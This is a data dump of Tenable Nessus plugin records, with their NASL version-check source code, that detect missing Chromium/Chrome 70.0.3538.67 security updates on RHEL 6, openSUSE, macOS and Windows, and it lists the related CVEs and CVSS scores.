(Blink).\n\nThis update upgrades Chromium to version 70.0.3538.67.\n\nSecurity Fix(es) :\n\n* chromium-browser: Sandbox escape in AppCache (CVE-2018-17462)\n\n* chromium-browser: Remote code execution in V8 (CVE-2018-17463)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17464)\n\n* chromium-browser: Use after free in V8 (CVE-2018-17465)\n\n* chromium-browser: Memory corruption in Angle (CVE-2018-17466)\n\n* lcms2: Integer overflow in AllocateDataSet() in cmscgats.c leading to heap-based buffer overflow (CVE-2018-16435)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17467)\n\n* chromium-browser: Cross-origin URL disclosure in Blink (CVE-2018-17468)\n\n* chromium-browser: Heap buffer overflow in PDFium (CVE-2018-17469)\n\n* chromium-browser: Memory corruption in GPU Internals (CVE-2018-17470)\n\n* chromium-browser: Security UI occlusion in full screen mode (CVE-2018-17471)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17473)\n\n* chromium-browser: Use after free in Blink (CVE-2018-17474)\n\n* chromium-browser: Lack of limits on update() in ServiceWorker (CVE-2018-5179)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17475)\n\n* chromium-browser: Security UI occlusion in full screen mode (CVE-2018-17476)\n\n* chromium-browser: UI spoof in Extensions (CVE-2018-17477)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-25T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2018:3004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-16435", "CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-3004.NASL", "href": "https://www.tenable.com/plugins/nessus/118373", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3004. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118373);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-5179\",\n \"CVE-2018-16435\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\"\n );\n script_xref(name:\"RHSA\", value:\"2018:3004\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2018:3004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 70.0.3538.67.\n\nSecurity Fix(es) :\n\n* chromium-browser: Sandbox escape in AppCache (CVE-2018-17462)\n\n* chromium-browser: Remote code execution in V8 (CVE-2018-17463)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17464)\n\n* chromium-browser: Use after free in V8 (CVE-2018-17465)\n\n* chromium-browser: Memory corruption in Angle (CVE-2018-17466)\n\n* lcms2: Integer overflow in AllocateDataSet() in cmscgats.c leading\nto heap-based buffer overflow (CVE-2018-16435)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17467)\n\n* chromium-browser: Cross-origin URL disclosure in Blink\n(CVE-2018-17468)\n\n* chromium-browser: Heap buffer overflow in PDFium (CVE-2018-17469)\n\n* chromium-browser: Memory corruption in GPU Internals\n(CVE-2018-17470)\n\n* chromium-browser: Security UI occlusion in full screen mode\n(CVE-2018-17471)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17473)\n\n* chromium-browser: Use after free in Blink (CVE-2018-17474)\n\n* chromium-browser: Lack of limits on update() in ServiceWorker\n(CVE-2018-5179)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17475)\n\n* chromium-browser: Security UI occlusion in full screen mode\n(CVE-2018-17476)\n\n* chromium-browser: UI spoof in Extensions (CVE-2018-17477)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2018:3004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-5179\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-16435\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17462\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17463\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17464\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17467\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17468\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17469\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17470\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17471\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17473\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17474\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17475\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17476\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17477\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-17462\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3004\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:25", "description": "This update for Chromium to version 70.0.3538.67 fixes multiple issues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen mode\n\n - CVE-2018-5179: Lack of limits on update() in ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions\n\nVAAPI hardware accelerated rendering is now enabled by default. This update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2018-1253)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-1253.NASL", "href": "https://www.tenable.com/plugins/nessus/118386", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1253.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118386);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2018-1253)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for Chromium to version 70.0.3538.67 fixes multiple\nissues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen\n mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen\n mode\n\n - CVE-2018-5179: Lack of limits on update() in\n ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions\n\nVAAPI hardware accelerated rendering is now enabled by default. This\nupdate contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112111\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-debuginfo-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debuginfo-70.0.3538.67-179.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debugsource-70.0.3538.67-179.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:09", "description": "The version of Google Chrome installed on the remote macOS host is prior to 70.0.3538.67. It is, therefore, affected by multiple vulnerabilities as noted in Google Chrome stable channel update release notes for 2018/10/16. Please refer to the release notes for additional information. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self- reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-16T00:00:00", "type": "nessus", "title": "Google Chrome < 70.0.3538.67 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_70_0_3538_67.NASL", "href": "https://www.tenable.com/plugins/nessus/118152", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118152);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-5179\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Google Chrome < 70.0.3538.67 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by\nmultiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is\nprior to 70.0.3538.67. It is, therefore, affected by multiple\nvulnerabilities as noted in Google Chrome stable channel update\nrelease notes for 2018/10/16. Please refer to the release notes for\nadditional information. Note that Nessus has not attempted to exploit\nthese issues but has instead relied only on the application's self-\nreported version number.\");\n # https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c8f5c86\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 70.0.3538.67 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-17472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'70.0.3538.67', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:59", "description": "The version of Google Chrome installed on the remote Windows host is prior to 70.0.3538.67. It is, therefore, affected by multiple vulnerabilities as noted in Google Chrome stable channel update release notes for 2018/10/16. Please refer to the release notes for additional information. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self- reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-16T00:00:00", "type": "nessus", "title": "Google Chrome < 70.0.3538.67 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_70_0_3538_67.NASL", "href": "https://www.tenable.com/plugins/nessus/118153", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118153);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-5179\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Google Chrome < 70.0.3538.67 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 70.0.3538.67. It is, therefore, affected by multiple\nvulnerabilities as noted in Google Chrome stable channel update\nrelease notes for 2018/10/16. Please refer to the release notes for\nadditional information. Note that Nessus has not attempted to exploit\nthese issues but has instead relied only on the application's self-\nreported version number.\");\n # https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c8f5c86\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 70.0.3538.67 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-17472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 